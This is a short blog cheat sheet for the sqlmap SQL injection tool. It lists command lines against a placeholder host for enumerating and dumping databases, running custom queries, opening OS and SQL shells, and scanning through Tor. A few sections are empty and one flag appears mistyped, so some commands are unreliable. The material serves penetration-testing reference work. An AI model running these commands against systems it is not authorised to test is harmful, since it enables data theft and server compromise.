SQLMap Cheat Sheet

2 min readJul 31, 2019


sqlmap is an open source penetration testing application that automates the detection and exploitation of SQL injection vulnerabilities as well as the takeover of database systems.

NOTE: for each command using --dbms=mysql.
You don’t need to use it if you do not know the type of database,
but if you do, it will be faster than the command without this.


# Enum DB

sqlmap --dbms=mysql -u “http://takumatest.domain/" --dbs

# Enum tables

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB --tables

--current-user : enum current user

--current-db : enum db name

# Use POST methods

sqlmap --dbms=mysql -u “http://takumatest.domain/" --data=”data1=aaa&data2=bbb”

# List of users and roles

sqlmap --dbms=mysql -u “http://takumatest.domain/" --users --roles --threads=10

# Custom Query

sqlmap --dbms=mysql -u “http://takumatest.domain/" --sql-query=”select * from master.sys.server_principals”

# Dump table

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB -T target_Table --dump

# List columns

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB -T target_Table --columns

# Parameter

sqlmap --dbms=mysql -u “http://takumatest.domain/param1=value1&param2=value2" --dbs -p param2

# Specify URIs

sqlmap --dbms=mysql -u “http://takumatest.domain/param1/value1*/param2/value2" --dbs

sqlmap -u ‘http://takumatest.domain/' --data=’param1=blah&param2=blah’ --cookie=’JSESSIONID=d02084cbe50e16aa4' --level=5 --risk=3 -p param1

# OS Shell

sqlmap --dbms=mysql -u “http://takumatest.domain/" --os-shell

# SQL Shell

sqlmap --dbms=mysql -u “http://takumatest.domain/" --sql-shell

# CMD Shell

sqlmap --dbms=mysql -u “http://takumatest.domain/" --os-cmd whoami

# Query

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB --sql-query “SELECT * FROM TABLE;”

# Where Condition

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB -T target_table --where “id>0”

# Scan through TOR

sqlmap -u “http://takumatest.domain/" --tor --tor-type=SOCKS5 --check-tor --dbms=mysql --dbs

# Basic authen & NTLM

sqlmap -u “http://takumatest.domain/” -s-data=param1=value1&param2=value2 -p param1 --auth-type=[basic/ntlm] --auth-cred=username:password


sqlmap -u “http://takumatest.domain/” --proxy=http://proxy_address:port

#Specific point to inject use *

sqlmap -u “http://takumatest.domain/abc/def/123*/data.php”

#Dump Limit

--start=1 --stop=10

#Bypass WAF (for example)



Stacked queries (S)
Error based (E)
Union query based (U)
Inline queries (I)
Boolean blind (B)
Time based blind (T)

#Clear cache


#Example for using command

sqlmap -r file-request.txt --random-agent --threads=10 --technique=B --level=3 --batch -D target_DB -T target_table --fresh-queries --count

— END —




Written by Takuma

Cybersecurity, Cryptocurrency :)

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